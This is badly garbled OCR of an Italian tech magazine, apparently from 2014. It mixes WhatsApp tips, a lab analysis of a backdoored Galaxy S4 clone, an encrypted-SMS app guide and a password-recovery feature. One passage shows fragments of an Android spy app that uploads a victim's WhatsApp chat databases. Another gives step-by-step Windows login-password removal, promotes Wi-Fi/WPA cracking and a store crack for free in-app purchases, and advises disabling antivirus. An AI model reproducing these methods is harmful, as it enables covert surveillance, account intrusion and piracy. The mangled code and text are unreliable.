; adatta. ' 


2-Chat in chiaro con l'app spia 

funzionamento “in mcogmtche 

permette di passare assolutamente 


SBIRCIARE TRA LA CHAT DI WHATSAPP 



Tsion ”i.D" encodinQ-"utr-8" 

xnlns:android- ,, http://sche«as.android.con/apk/res/android" 
package- *bb .security.whatsappupload" 
android:versionCode="l" 
anaroio:versiorma»e="i.tr > 


use» - pei ! .bbiuii ondi uxJ. 
use» uer«is»ion android. 


itti r-"aiHJ> Old.pel •i»»Auti.RCAD_CXTCRhAL_5TORAGC“ /- 
a. . "android.peraission.INTERNET" 


in os Environaant; 
min.app.arrivi ry; 
android.app.Krogres suialog: 

«indt uni. ulti. Luy. 
npjrt ondi Old.vie*.Menu. 

ubile class MainActivity oxtonds Actlvity ( 

//A Programma mg nnjoct 

private Krogressuialoc prooressoialog; 


usea 3dk 

android : «ni nSdkVcrsi on="8" 
android- target Sdir versione 


19" /> 


application 

android:allowBackuo-'true" 
android:icor-"@drawable/ic_launcner 
android: Ubel="tstrlng/app_na*e H 
android:the#e=”@style/AppThe«e" > 



governa* 

protected vold oncratte(Pundle savedinstancestate) { 

-.onCroato{cavodlnctarccStato ); 
setContentview(R.layout.actlvlty.oain); 
new uploadWhatsApp().axocuta(); 

} 

governa* 

public boolean oncreateoptionsMenu(««nu Menu) { 

// innate thè *enu; this adds iteas to tho action bar if ìt ìs prcsont. 



L'hacker modifica anche il file AndroidManifest.xml di Android 
che tutte le app usano, in genere, per ottenere i permessi neces¬ 
sari per apportare modifiche al sistema e completare le procedu¬ 
re di installazione. In questo caso, l'hacker aggiunge le istruzioni 
per ottenere l'accesso in lettura e scrittura alla scheda di memoria 
dello smartphone. 


Questo script contiene le istruzioni per caricare in remoto i fi¬ 
le msgstore.db e wa.db, cioè i database delle chat. Nelle ultime 
versioni di WhatsApp sono stati criptati e si trovano nel per¬ 
corso: /WhatsApp/Databases/msgstore.db.crypt. Ma con un nuovo 
script in Pyhton gli hacker sono riusciti a “bucare” anche que¬ 
sta protezione! 
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WhatsApp offre di più! 


30 trucchi mai visti per usare la chat da vero hacker e ottenere il 

massimo dairapplicazione di messaging più utilizzata al mondo 



WhatsApp 


APRILE 2014 


RIMANIAMO SEMPRE 
AGGIORNATI 

Desideriamo sfruttare prima degli altri le 
nuove funzioni di WhatsApp? Abbiamo la 
possibilità di disporre di nuove versioni 
di Messenger, prima che queste arrivino 
negli App-Store. 

Apriamo il menu delle Impostazioni del no¬ 
stro dispositivo Android, portiamoci sulle vo¬ 
ci Opzioni e Sicurezza, e spuntiamo l'op¬ 
zione Origine sconosciuta. Accediamo ora 
dal browser all'indirizzo www.winmagazine. 
it/link/2547 e digitiamo Download. Succes¬ 
sivamente basterà installare il file scaricata 
Per sicurezza, eliminiamo poi dalle imposta¬ 
zioni il segno di spunta apposto in preceden¬ 
za alla voce Origine sconosciuta. 


SALVIAMO LE NOSTRE CHAT 

Abbiamo allacciato contatti con i nostri 
amici attraverso piacevoli chat che vo¬ 
gliamo conservare per sempre? Via e- 
mail potremmo trasferire al nostro PC 
"chiacchierate" a piacere, comprese foto 
e video. Ecco in che moda 
• And roid/Wìndows Phone 
Sulla lista delle chat, premiamo a lungo sul 
contatto desiderato e tappiamo poi su Invia 
chat via email. 


pattina me 

iggio 


Info contatto 


Invia conversazione via email 


Apriamo l'elenco delle chat effettuate e fac¬ 
ciamo scorrere il dito da destra a sinistra sul 
nome del contatto di cui vogliamo inviare la 
chat Dal menu che apparirà selezioniamo 
Altro e poi I nvia conversazione via email. 


Annulla 


RITAGLIAMO! 

PARTICOLARI DALLE FOTO 

Gli schermi degli smartphone offro¬ 
no uno spazio ridotto e possono es¬ 
sere visualizzati solo i dettagli più 
importanti delle fota WhatsApp 
mette a disposizione una funzione 
per ritagliare singoli particolari. 

Dal servizio di chat cucchiamo sulla 
freccia, in basso a sinistra e portiamoci 
su Scegli foto esistente. Dopo aver 
scelto l'immagine, tappiamo in alto a 
destra sul simbolo dello stilo e sceglia¬ 
mo l'utensile per il ritaglio (icona centra¬ 
le). Avviciniamo gli spigoli in modo che 
la griglia incornici il particolare deside¬ 
rato e tappiamo su Invia. 


UN GRUPPO PIU RISERVATO 

Per poter chattare contemporaneamente con («63 
50 persone, esistono oltre ai "Gruppi" anche i JP 
"Broadcast". La differenza è che i destinatari 
deila chat non possono vedersi tra di loro, ma ri¬ 
spondere solo a noi. Un caso tipico è quando vo- 
gllamo fare gli auguri di Buona Pasqua a paren- 
ti e amici. 1 

. IOS £"■“ 

Cucchiamo sulla Usta Chat e poi in alto a sinistra su jg 

Uste Broadcast. . e**» 

• Android -i,.,,. 

Dalla lista delle chat portiamoci su Menu e selezio¬ 
niamo Nuova lista Broadcast. ■ s ““ 

• Windows Phone 8 

Nella finestra Chat tappiamo in basso a destra sui tre puntini e 
successivamente su Nuovo Broadcast. 


Minimum requirement; 


TtM 30 1144 

Chat (46) 

1 

■ 




WHATSAPP: ECCO IL TRUCCO UNOFFICIAL PER USARLO ANCHE SUL PC 

Scarichiamoe installiamo il programma di messag- www.winmagazine.it/link/2550eawiamolo.Nella una password: copiamola! Awiamo Pidginedalla 
gistica Pidgin da www.winmagazine.it/link/2548. finestra che appare, in Phone number inseriamo il finestra Account cucchiamo su Aggiungi. Da Pro- 
Scarichiamo quindi il plug-in whatsapp-purple da nostro numero di telefono preceduto dal prefisso tocollo selezioniamo WhatsApp. In Nome utente 
www.winmagazine.it/link/2549 e copiamolo nella internazionale 39. Selezioniamo S MS e clicchiamo inseriamo il nostro numero di telefono preceduto da 
cartella C:\ProgramFiles (x86)\Pidgin\plugins. A su Requestcode. Ricopiamo in Code l’SMS ricevuto 39, inseriamo la password copiata precedentemente 
questo punto scarichiamo il programma WART da e terminiamo con Confimi code. Verrà mostrata e terminiamo con Aggiungi. 
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CHATTARE DA UN LUOGO 
FITTIZIO 

Con Android, anziché rivelare II nostro attua¬ 
le luogo di villeggiatura, possiamo anche fa¬ 
re credere di essere in un’altra località. 

Nel menu Impostazioni del cellulare, alla voce 
Opzioni sviluppatore attiviamo la funzione 
Consenti posizioni fittizie o Posizioni simu¬ 
late, Successivamente, scarichiamo dal Play 
Store l’app gratuita Fake GPS location. All'inter¬ 
no di WhatsApp facciamo ora tap sulla clip in al- 
• Cwi to a destra del servizio di chat e selezioniamo 

Posizione. Passiamo ora all’app Fake GPS, ap¬ 
poniamo il contrassegno rosso sulla posizione 
desiderata e tappiamo su Set Location. Richia¬ 
miamo WhatsApp e procediamo a rendere nota la località appena selezionata, 
tramite l'opzione Invia la tua posizione attuale. 


1 

»* ' 



(D 


® i£ 


sono casa mi»; 

2014 sfl 



PROGRAMMI AGGIUNTIVI 
PER ANDROID 

Per gli utenti Android, WhatsApp met¬ 
te a disposizione un pratico Widget, 
con il quale potremo tenere sotfoc- 
chio sulla Floine le ultime chat e i mes¬ 
saggi più recenti. In tal modo, avremo 
la possibilità di leggere i messaggi 
senza dover avviare l’app. 

Per posizionare il widget sulla Home, 
manteniamo premuto il dito su un punto 
libero dello schermo finché non compare 
il menu per le selezioni. Da qui potremo 
scegliere Widget o App e Widget e poi 
trascinare l'icona WhatsApp in un altro 
punto. Qui troveremo anche la nuova fo¬ 
tocamera Widget di WhatsApp. In un atti¬ 
mo, potremo inviare immediatamente fo¬ 
to e video ai nostri amici. Per le foto, basterà tappare brevemente sul bollino blu 
del Widget, mentre per i video sarà sufficiente tenerlo premuto. 



<D<g> 



CONTATTI RAPIDI 

Per i nostri contatti preferiti, potremo creare dei collegamenti sulla Home. 
Basterà un semplice sfioramento del dito per avviare una chat. 

All'Interno di WhatsApp premiamo a lungo un contatto della lista chat, finché 
non compare il menu. Da qui, potremo selezionare Crea shortcut per la chat (An¬ 
droid) o Invia a Start (per Windows Phone 8). 




WHATSAPP SUL TABLET 

Come sappiamo, il dient di chat funziona solo se 
abbinato ad un numero telefonico, quindi, teori¬ 
camente, non dovrebbe essere possibile instal¬ 
larlo sui tablet privi della connessione 3G. Ma 
con un piccolo trucco possiamo aggirare questa 
limitazione. 

Da www.winmagazine.it/link/2547 scarichiamo il file APK di WhatsApp per Android. Co¬ 
piamolo nella memoria del tablet ed eseguiamo l'installazione manuale attraverso un file 
manager. Avviamo l'applicazione e inseriamo un numero di telefonino valido. WhatsApp 
cercherà di rilevare l'SMS col codice di verifica e dopo alcuni istanti restituirà un messag¬ 
gio di errore. A questo pu nto tocchiamo il tasto Chiamami. Riceveremo una chiamata 
sul numero di telefono inserito che d comunica il numero di attivazione dell'app. Digitia¬ 
molo nel tablet e portiamo a termine la configurazione. 
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ss: 


© Cambia numero 


Per favore, inserisci il tuo ve- 
prefisso internazionale e nui 
telefonico 

39 vecchio numero 


Per favore, inserisci il tuo nu 
prefisso internazionale e nui 
telefonico: 


39 


nuovo numero 


CAMBIARE NUMERO 

CON SEMPLICITÀ 

Abbiamo un nuovo numero di telefono? Ec¬ 
co come associarlo fadlmente a WhatsApp 
Dal menu Impostazioni portiamod su Ac¬ 
count e tappiamo su Cambia numero e 
poi su Successivo. Su Windows Phone do¬ 
vremo tappare sulla freccia di Cambio nu¬ 
mero e poi apporre il segno di spunta. Nel 
primo campo, digitiamo II vecchio numero e 
quello nuovo nel secondo campo. Dopo 
aver tappato su Fine, WhatsApp prowederà 
a trasferire sul nuovo numero tutte le infor¬ 
mazioni dell'account, compresa la modalità 
per i pagamenti, il profilo e la cronologia del¬ 
la chat Sul vecchio numero non saremo ora 
più raggiungibili. 





BLOCCHIAMO 
LE INFORMAZIONI 

Non tutti devono sapere cosa stiamo fa¬ 
cendo in quel momento e se siamo on-line. 

Se desideriamo tenere nascoste queste infor¬ 
mazioni a determinati contatti, tappiamo su 
Account e poi su Privacy, dal menu per le 
Impostazioni. Qui, potremo impostare chi 
è autorizzato a vedere se siamo on-line, il no¬ 
stro profilo e il nostro status. Potremo sele¬ 
zionare Tutti, Miei contatti e Nessuno. 




INVISIBILI SU WHATSAPP 

G sono diversi trucchi per aprire 
WhatsApp senza che i nostri contatti 
possano vederci on-line o leggere i mes- 
J >>«,• Q saggi ricevuti senza inviare la conferma 

di lettura, avendo comunque la possibi¬ 
lità di postare in chat 
Il primo consiste nel disabilitare le connes¬ 
sioni dati dello smartphone (iOS o Android) 
abilitando la Modalità Aereo dalle Impo¬ 
stazioni del cellulare: questo ci permetterà 
di accedere a WhatsApp indisturbati. Un al¬ 
tro modo è quello di ricorrere a un'app co¬ 
me Whatshadows, disponibile in versione 
trial per 7 giorni sul dispositivi Android: aggiunge a WhatsApp un tasto che raffi¬ 
gura un fantasmino. Toccandolo ci permetterà di occultare o meno la nostra pre¬ 
senza in Rete. Esistono anche alternative gratuite come W-Tools. 


Suggerisci wtvauApp « tuoi «n. 


© Aiuto Contadi 



emù 


< Imp. Chat Bloccato 


Aggiungi nuovo... 


I contatti bloccati non saranno pu 
di inviar! massaggi 


BLOCCHIAMO 
GLI SCOCCIATORI 

C'ì qualcuno che d tempeste di messaggi 
indesiderati? Nessun problema, in 
WhatsApp possiamo bloccarlo! 

Per farlo andiamo in Impostazioni/lmpo- 
stazioni chat e tocchiamo l'opzione Bloc¬ 
cato. Scegliamo poi l’opzione Aggiungi 
nuovo e selezioniamo dalla rubrica la perso¬ 
na da bloccare. Dopo averla aggiunta, non 
sarà più in grado di inviarci alcun messaggio! 
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Backdoor negli smartphone Samsung 



Centro sicurezza 
Win Magazine 


I cellulari 
con la spia! 


Abbiamo scoperto che sul mercato 
europeo viene venduto un clone 
economico del Samsung Galaxy S4 
davvero pericoloso. Ecco perché! 


G li aficionados di Amazon probabil¬ 
mente lo avranno già visto (e magari 
volevano acquistarlo). Stiamo par¬ 
lando dello "Star N9500”, uno smartphone 
molto apprezzato dagli utenti e venduto 
in Europa su diversi siti di e-commerce. 
Tuttavia, anche se TN9500 costa circa 160 
euro, chi aveva dei dubbi su di esso aveva 
ragione, come dimostrato da recenti test 
di sicurezza. 

Preoccupazioni legittime 

Tecnicamente non ci si può lamentare del¬ 
lo smartphone, che è una replica 1:1 del 
Galaxy S4, fatta talmente bene da renderlo 
esteriormente indistinguibile dal telefono 
Samsung (che costa circa 300 euro). Per 
quanto riguarda i componenti utilizzati, il 



■ Gli esperti di sicurezza Mathias Otten e Olaf Pursche hanno inserito lo smartphone in uno speciale dispositivo per Isolarlo e analizzarlo. Cosi facendo è possibile 
esaminare qualunque comunicazione Wireless senza che il produttore possa avere accesso al sistema. 


amazon* 


uein Amazon Anoe Dote Gutscnetne vettaufen rare 

SuUie Cu iiuutet & Zubetwji * 


Halle' AnrrtAldAfl Pnm* 

Mem Konto - testen 


Kategoricn * 

< nmptitpr Antenato Motorino»*; iarn»!s Komponenten c:ompiitt»i-/iin*nnr Kc-uammg Monitore Dmrxer 



Star N9500 - 5.0 inch (1280*720) HD IPS screen 
Android 4.2 1 2GHz Quad Core 3G Smart Phone 
MTK6589 dual sim dual standby. 8MP dual camera 
1G RAM (8GB ROM Black) 


ere!*: EUR 162,00 

Ale Preisangaben inkl. MwSt. 

Nur nodi 16 auf Lager 

VarVauf unri VeroinH Hurr+i BwinvHpal fN Fwr weitar» 1 nfrwrrurtion^n, 
Imprejjum, AGO und Widerruferecht khckcn Sic bine o<J den 
m i it 

• a limiti Mneu ihs ( .araritib-e miiitwnnm 


■ Invece di spendere oltre 300 euro per un Galaxy S4, è meglio spenderne 160 per un clone cinese? Peccato 
che questo abbia anche pericolose funzioni di spionaggio! 
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Backdoor negli smartphone Samsung 
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■ L'analisi del firmware operata dal team di Geschkat ha svelato che il produttore ha inserito nel sistema 
Android dell'N9500 un app store nascosto che tra le altre cose gli permette di avere accesso completo al 
device tramite server cinesi. 


display da 5 pollici offre una qualità de¬ 
cente, mentre il processore quad core da 
1,2 GHz e gli 8 gigabyte di memoria sono 
più che sufficienti per far girare Android 
4.2. Inoltre, su alcuni mercati, è possibile 
trovare in dotazione oltre alle cuffie anche 
una seconda batteria. Peccato che questo 
smartphone abbia una doppia identità: 
da un lato clone perfetto ed economico, 
dall’altro indomito spione. Questo, alme¬ 
no, è quello che ha rilevato la squadra di 
tecnici capitanata da Christian Geschkat 
nei laboratori di G Data. L'esperto di sicu¬ 
rezza ha dichiarato che “Molti dei nostri 
clienti ci hanno segnalato come la nostra 
suite di sicurezza rilevasse come perico¬ 
losa un’app con l’icona del Google Play. 
Poiché l’alert riguardava un'applicazione 
presente nel firmware, abbiamo recupe¬ 
rato uno smartphone per analizzarlo." 

Possibilità illimitate 
di manipolazione 

L’analisi del codice del firmware in labora¬ 
torio ha fatto emergere che il sistema ope¬ 
rativo dello Star N9500 è stato manipolato 
dal produttore. Oltre al Google Play c'è una 
seconda alternativa per installare le app, che 
però non compare nel menu dello smart¬ 
phone. Questo secondo app store segreto 
nascosto all’utente serve solo al produtto¬ 
re dello smartphone per scopi discutibili. 
Permette di nascondere le porte che il 
sistema lascia aperte per consentire un 
eventuale accesso remoto, proprio come 
se fosse un vero e proprio trojan. 

• Applicazioni dannose: questo app store 
segreto può consentire al produttore ci¬ 
nese di iniettare programmi dannosi nel 


sistema e utilizzare il dispositivo come 
parte di una botnet Queste app, una volta 
installate, non appariranno all’interno 


del menu del telefono. Ma non è tutto: 
le istruzioni relative all’installazione 
vengono immediatamente cancellate 
dai registri dello smartphone e, come 
svelato dal team di Geschkat, gli ag¬ 
giornamenti di sicurezza distribuiti da 
Google possono essere bloccati. 
Intercettazione delle telefonate: il pro¬ 
duttore può vedere quando e con chi 
si è parlato. E caricando delle apposite 
app è possibile anche intercettare le 
conversazioni. 

Spionaggio tramite fotocamera e mi¬ 
crofono: la fotocamera e il microfono 
possono essere attivate a distanza così 
l’utente sarà spiato facilmente. Inoltre, 
il produttore può accedere anche ai dati 
di geo-localizzazione dello smartphone. 
Intercettazione di SMS ed e-mail: anche 
gli SMS possono essere spiati dal produt¬ 
tore cinese di questo smartphone che, 
ad esempio, potrebbe leggere codici di 
sicurezza per l’accesso a siti o addirittura 
al nostro on-line banking. Si può cadere 
vittima dell’invio di SMS a pagamento 
con servizi premium 
e le impostazioni del 
dispositivo permet¬ 
tono addirittura al 
produttore di avere 
accesso alle e-mail e 
ad altri dati ancora. 

Alla larga dallo 
spione cinese! 

Il team di Geschkats 
ha individuato la de¬ 
stinazione dei dati 
trasmessi dallo smar¬ 
tphone: “Tutti i dati 
vengono trasmessi 
ad un server anoni¬ 
mo. Le loro tracce si 
perdono in Cina”, ma 
è chiaro che per il pro¬ 
duttore l’N9500 è un 
doppio investimento. 
Gli utenti non solo lo 
pagano con denaro 
contante, ma anche 
con i propri dati. Gli 
esperti di sicurezza di 
G Data hanno infor¬ 
mato Amazon, che lo 
ha rimosso dal proprio 
sito, ma il telefono 
spia è ancora dispo¬ 
nibile su altri canali. 
Il nostro consiglio è 
di non acquistarlo per 
nessun motivo! 



■ L'app di sicurezza di G Data ha individuato il "play store' segreto che 
non compare in nessun menu del dispositivo. Solo dii ha familiarità con la 
programmazione Android riesce ad individuarlo. 
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teìlettazione 

Tì regaliamo l’app da installare sul 
tuo smartphone per “nascondere” 
ogni tua conversazione 


Cosa ci r J 
occorre 

APP ANDROID 

CRYPTOSMS 

Lo trovi su: PTWD 


SOFTWARE COMPLETO 


Sito Internet 

www.winmaga 2 ine.it 


0 


I gni secondo in Italia vengono invia¬ 
ti centinaia di SMS: nel solo mese di 
Gennaio sono stati più di 38 milioni i 
messaggini inviati (www.winmagazine.it/ 
link/2413)! Numeri stratosferici che di fatto 
incoronano questa forma di comunicazione 
come la preferita dai nostri connazionali. Non 
è un caso, d’altronde, che tutti gli operatori di 
telefonia mobile offrono con le loro offerte non 
meno di 100 messaggi gratuiti al mese. Con 
gli SMS viaggiano informazioni di ogni tipo: 
da semplici conferme per gli appuntamenti 
con gli amici a dati sensibili come password 
di accesso ai servizi on-line e altri codici se¬ 
greti. È evidente, quindi, come proprio gli 
SMS siano diventati una fonte inesauribile 
di informazioni personali preziose per ladri 
informatici e malintenzionati di ogni sorta! 

Un’app su misura 

Per dare una soluzione al problema delle in¬ 
tercettazioni telefoniche abbiamo realizzato 
nei nostri laboratori un’applicazione per di¬ 
spositivi Android che permette di scambiare 
facilmente SMS criptati. CryptoSMS, questo 
il nome dell'app, utilizza un sistema di cifra¬ 
tura con password a prova di furto. La chiave 
di accesso, infatti, viene creata e condivisa 
esclusivamente da chi intende scambiare SMS 
in maniera sicura: non ci sono server remoti che 
memorizzano queste password e consentono 
il transito dei messaggi. Invio e ricezione degli 
SMS vengono gestiti direttamente dall'applica¬ 
zione sfruttando in maniera "furba" la normale 
applicazione Messaggi di Android: il numero 
di SMS del nostro piano telefonico, infatti, non 
viene intaccato. Inoltre, prima di inviare e ri¬ 
cevere il messaggio dovremo inserire la chiave 
di decodifica dell’SMS, che altrimenti risulterà 
completamente illeggibile. Ma non perdiamo 
altro tempo e impariamo ad inviare il nostro 
primo messaggio a prova di intercettazione! 






| CryptoSMS | Software | 
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Public 




Completa azione usando 


» 

w 

8®- 

Installcr 

Verifica c 

pacchetto 

installa 

Sempre 

Solo questa volta 




Ecco rapo 

esclusiva 

a CryptoSMS è un 
regalo esclusivo 
per i lettori di 
Win Magazine e non si 
trova sul Google Play 
Store: per installarla, 
scarichiamo l’archivio 
CryptoSMS.zipóaì Win 
DVD-Rom, scompattia¬ 
molo e copiamo l’APK 
nella memoria dello 
smartphone. Tappiamo 
quindi su questo file e 
selezioniamo Verìfica e 
installa. 


Q v Qà T .ili ■ 12:22 

Jfe CryptoSMS 

Installare questa applicazione? 

Consenti a questa applicazione 
di: 

• Messaggi personali 

leggi SMS o MMS, ricevi SMS 

• Servizi a pagamento per 
l'utente 

Invia SMS 


Una semplice 

installazione 


f| Nellanuovascher- 
> A I mata tappiamo 
J Jsu Installa per 
procedere con la sem¬ 
plice installazione dell ’ap- 
plicazione. La procedura 
durerà solo pochi secon¬ 
di. Al termine tappiamo 
Aprì per avviare diretta- 
mente la semplice inter¬ 
faccia grafica di Crypto¬ 
SMS. Tappando Fatto, 
invece, l’app sarà avvia¬ 
bile direttamente dal 
menu ApplicazionideWo 
smartphone. 


MiT.il «12:26 

Ut CryptoSMS 


CryptoSMS 

Memorizza la tua password 


Cancel 


Ok 


qwertyu iop 


Impostiamo 

la password 

n Al primo avvio di 
I CryptoSMS cre- 
.—J iamolapassword 
che verrà usata per crip- 
tare i messaggi e che 
dovremo comunicare alla 
persona con cui comu¬ 
nicare in tutta sicurezza 
(eche, ovviamente, dovrà 
installare l'app con la 
procedura vista finora). 
Creiamo un nuovo mes¬ 
saggio tappando sul + 
in alto a destra e compi¬ 
liamo il campo Destina¬ 
tario. 


Destinatario 


Testo 

ciao carmelo: ecco il codice di 
accesso al servizio di home 
banking..] 


Invia 


I messaggi 

sono minati 


Digitiamo il Testo 
e tappiamo towà. 
destinatario 
dovrà inserire la password 
(Passo 3} per leggere 
l’SMS! Per chiudere l’app 
ricordiamoci dì premere 
il tasto Indietro dello 
smartphone: in questo 
modo ad ogni succes¬ 
sivo avvio ci verrà chie¬ 
sto di inserire nuova¬ 
mente la password di 
decodifica, per avere 
sempre il massimo del¬ 
la sicurezza! 


ECCO COME FUNZIONA L'INVIO DI UN MESSAGGIO CON CRYPTOSMS 



1 11 mittente inserisce la 
password percriptare 
il messaggio 

2 Seleziona 

il destinatario e scrive 
il testo delI'SMS 

Invia il messaggio 
mediante CryptoSMS 


1 11 destinatario riceve 
una notifica di "Nuovo 
messaggio" 

Inserisce la password per 
decriptare il messaggio 

3 Legge in chiaro l'SMS 
esclusivamente da 
CryptoSMS 
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COME USARE LO SCOVA PASSWORD 

Alcuni dei metodi illustrati nell'articolo sono gli stessi utilizzati dagli 
hacker per superare i diversi sistemi di protezione dei nostri dati, an¬ 
che quelli "alternativi'’che dovrebbero garantirci un maggiore grado 
di sicurezza, richiedendo per l'accesso al PC informazioni aggiuntive 
oltre alla classica password, come ad esempio i lettori di impronte 
digitali o gli scanner della retina, ma che eliminando appunto la pas¬ 
sword di accesso, perdono la loro validità. Mettiamo quindi in pratica 
le procedure indicate esclusivamente sul nostro computer oppure su 
quello dei nostri amici ma solo dopo avere ottenuto il loro consenso! 




Cosaci 
occorre 

KTT DI RECUPERO 

LO SCOVA 
PASSWORD 


SOFTWARE COMPLETO 


Lo trovi su: MAIO 

Sito Internet 

www.winmagazine.it 


£ £ IR MM i serve un file, anzi, mi serve 
® ® Ilei proprio quel file ma... dove l'ho 
IVI salvato? Ah sì, è sul vecchio PC! 
Lo riaccendo ma è passato troppo tempo 
dall’ultima volta che l’ho usato e purtroppo 
non ricordo più la password di accesso a 
Windows! E adesso?”. Tante volte ci siamo 
imbattuti in questa o in situazioni simili, in 
cui è necessario accedere a vecchi documenti 
o addirittura accendere dispositivi protetti 
da una password che, anche pensando e 
ripensando, proprio vuole tornarci in mente. 
Nemmeno i famosi "suggerimenti”, le doman¬ 
de di sicurezza o gli innumerevoli tentatici di 
inserimento ci danno una mano, anzi spesso 
ci confondono e depistano ancora di più. 

Accesso consentito: 
ecco le soluzioni software 

Per fortuna abbiamo la possibilità di rime¬ 
diare a questo fastidioso inconveniente. Le 
soluzioni per riottenere l’accesso al nostro 
sistema e alle cartelle in cui sono archiviati 
documenti e dati personali esistono, anche se 
non sempre risultano semplici da mettere in 
pratica. Con le dritte giuste, però, riusciremo 
a superare anche i più ostici sistemi di prote¬ 
zione. Grazie ad alcuni particolari strumenti 
software, infatti, in pochi e semplici passaggi 


Lo scova 
assword 


Ti sveliamo le procedure segrete 
per scardinare PIN, impronte 
digitali e codici di accesso 
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LO SCSVA 


■;:TOV[»N ' 


Il software per violare 
qualsiasi codice di accesso 


□ 



I Archivi protetti 




Il nostro esclusivo disco di emergenza per recuperare i codici di accesso di: Windows, Office, router 
Wi-Fi, archivi compressi e file PDF protetti e... tanto altro ancora. 


TOOL DA UTILIZZARE 

RECUPERA LE PASSWORD DI... 

GUIDA PRATICA 

NTPASSWORD 

Windows ( tutte le versioni tranne Windows 8.1 con account locale) 

pag. 72 

APPNIMI RAR PASSWORD UNLOCKER 2.02 

Archivi compressi in formato RAR/ZIP protetti da password. 

pag.73 

APPNIMI PDF UNLOCKER2.0 

Documenti POF protetti da password 

pag.73 

APPNIMI WORD PASSWORD RECOVERY 2.5 

Documenti Word/Excel protetti. 

pag.73 

UFO WARDRIVING 4INVASION 

Router Wi-Fi (compresi quelli di Alice, Drink, Fastweb...). 

pag. 74 

WPA TESTER 4 

Router Wi-Fi protetti con chiavi WPA e WEP. 

pag.74 

WINDOWS STORE SERVICE CRACK 

Applicazioni scaricabili dal Windows Store. 

pag.75 


Nella sezione pedali del Win DVD-Rom sono presenti tanti altri tool specifici per il recupero password 


saremo in grado di accendere normalmente 
il nostro computer, senza dover inserire al¬ 
cuna chiave di accesso. Utilizzando NTPas- 
sword, ad esempio, bastano pochi secondi 
per eliminare la richiesta di inserimento 
password quando accendiamo un computer 
con sistema operativo Windows. Funziona su 
qualsiasi versione, dalle più vecchie e diffuse 
come Windows XP, fino alle ultime versioni 
di Windows 8/8.1. E il bello è che in tutti i casi 
la procedura da seguire è sempre la stessa! 
L’unica circostanza in cui NTPassword non 
riesce a compiere il suo dovere è quando 
l’account utente è archiviato e sincronizzato 
direttamente on-line sui server Microsoft 
e non in locale sul computer: per fortuna 
questa particolare tipologia di accesso è di¬ 
sponibile solamente da Windows 8 in poi e 
comunque non è obbligatorio utilizzarla. 

Una memoria aggiuntiva 

Non esiste solo Windows, però: ormai siamo 
circondati da password, codici e nomi utente 
su ogni dispositivo! Anche i nostri soldi gestiti 
mediante bancomat e carte di credito sono 
protetti da una password. Ecco quindi nascere 


la necessità di una memoria aggiuntiva che ci 
aiuti a sopperire alle nostre dimenticanze. Da 
internauti “esperti", ad esempio, utilizziamo 
sempre più spesso la funzione integrata in tut¬ 
ti i browser per il salvataggio delle password di 
accesso ai vari siti Web. Una comodità, certo, 
ma basta cambiare computer o anche solo il 
browser e la frittata è fatta: vai a ricordartela 
poi la password! Ma non finisce qua e non ci 
sono solo le password da tenere a memoria. 
Sempre più spesso, ad esempio, acquistiamo 
on-line il codice seriale per l’attivazione di un 
software che avevamo scaricato in versione 
trial: cosa succede se dobbiamo reinstallarlo 
e non troviamo più l’e-mail in cui era indicato 
il seriale? Anche a questo per fortuna c’è rime¬ 
dio. Grazie ad altri potenti tool (tutti gratuiti) 
saremo in grado di recuperare informazioni 
sull’installazione di molti programmi. Altri 
strumenti specializzati, invece, ci danno la 
possibilità di togliere ogni protezione da do¬ 
cumenti Word, cartelle Excel, archivi RAR e 
file PDF protetti da password. Questi software 
utilizzano il metodo del brute force, ovvero 
un attacco di tipo brutale che prova tutte le 
possibili password ad una ad una, fino a tro¬ 


vare quella corretta. È opportuno far notare, 
però, che i tool descritti nell'articolo, per la 
loro natura intrinseca di “scova password", 
potrebbero essere captati dai software an¬ 
tivirus come file potenzialmente dannosi e 
quindi bloccati. In realtà, non si corre alcun 
rischio utilizzandoli e, consapevoli di ciò, 
prima di utilizzarli è opportuno disattivare 
temporaneamente la protezione in tempo 
reale del nostro antivirus, riattivandolo solo 
una volta terminata la procedura di recupero 
della password. 

Non solo software! 

Nell’articolo analizzeremo, inoltre, i me¬ 
todi utilizzati da hacker e smanettoni per 
recuperare le password delle reti Wi-Fi o dei 
router protetti dal sistema WPS. Scopriremo 
come fanno ad effettuare in-app purchase, 
ovvero ad acquistare oggetti aggiuntivi 
come le vite, l'energia o le armi nei vari 
giochi presenti nel Market Place di Micro¬ 
soft Windows (il tutto in maniera gratuite) 
e a scaricare gratis giochi ed applicazioni 
dal Play Store di Google. Insomma, ce n’è 
davvero per tutti i gusti! ► 
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Password di Windows ko! 

Dopo aver masterizzato la ISO NTPassword su di un DVD vuoto, effettuiamo il boot da CD per caricare il tool 
che permette di disattivare la richiesta di password all’avvio del sistema operativo. Ecco come procedere. 



Il disco di avvio è pronto! 

■J Abilitiamo il boot da CD/DVD: all'accensio¬ 
ne del PC premiamo F2 o ESC per acce¬ 
dere al BIOS: spostiamoci in Boot/Boot Device 
Priorìtye settiamo CD/DVD-ROM Drive come peri¬ 
ferica d'awio. Inseriamo il disco con la ISO maste¬ 
rizzata nel lettore e riawiamo il PC. 



Cancelliamo la password 

^ Digitiamo ancora 1 (confermando con 
il tasto Invici) per eliminare la password 
dell'utente in questione. Questa scelta quindi non 
recupererà la password di Windows, ma eliminerà 
l'obbligo di inserire la password quando si accen¬ 
de il computer, permettendoci così accesso ai file. 



^ Facciamo la scelta giusta 

2 All'awio di NTPassword premiamo Invio al 
prompt Boot. Il software effettua una scan¬ 
sione per individuare le installazioni di Windows. 
Selezioniamo la versione corretta del sistema ope¬ 
rativo premendo Invio (in pratica selezionando 1, 
che è la scelta predefinita di NTPassword). 



Confermiamo le modifiche 

A lavoro ultimato, confermiamo le modifi¬ 
che effettuate al sistema: selezioniamo la 
voce q per uscire, confermiamo con Invio, salviamo 
premendo y e Invio. Il programma ci chiederà se 
vogliamo ricominciare da capo: digitiamo n e pre¬ 
miamo Invio. Rimuoviamo il CD e riavviamo il PC. 



^ Questione di utente 

Scegliamo l'opzione 1 per il reset del¬ 
le password e attendiamo che II software 
rilevi gli account utente attivi. Digitiamo di nuovo 
1 per selezionare Edit user data and password e 
premiamo Invio. Scegliamo il nostro account digi¬ 
tando in RID corrispondente e premiamo Invio. 



^ L’accesso è libero! 

0 Al nuovo avvivo saremo in grado di accede¬ 
re al computer senza dover inserire alcuna 
password, recuperando così l'accesso completo a 
Windows, per poter effettuare altre operazioni come 
recuperare seriali di altri software come Windows e 
Office, o accedere alla nosfra Mailbox. 


ACCOUNT ON-LINE: IL RECUPERO I IMPOSSIBILE! 


Con Windows 8 Microsoft ha introdotto una 
nuova tipologia di account Denominata remota, 
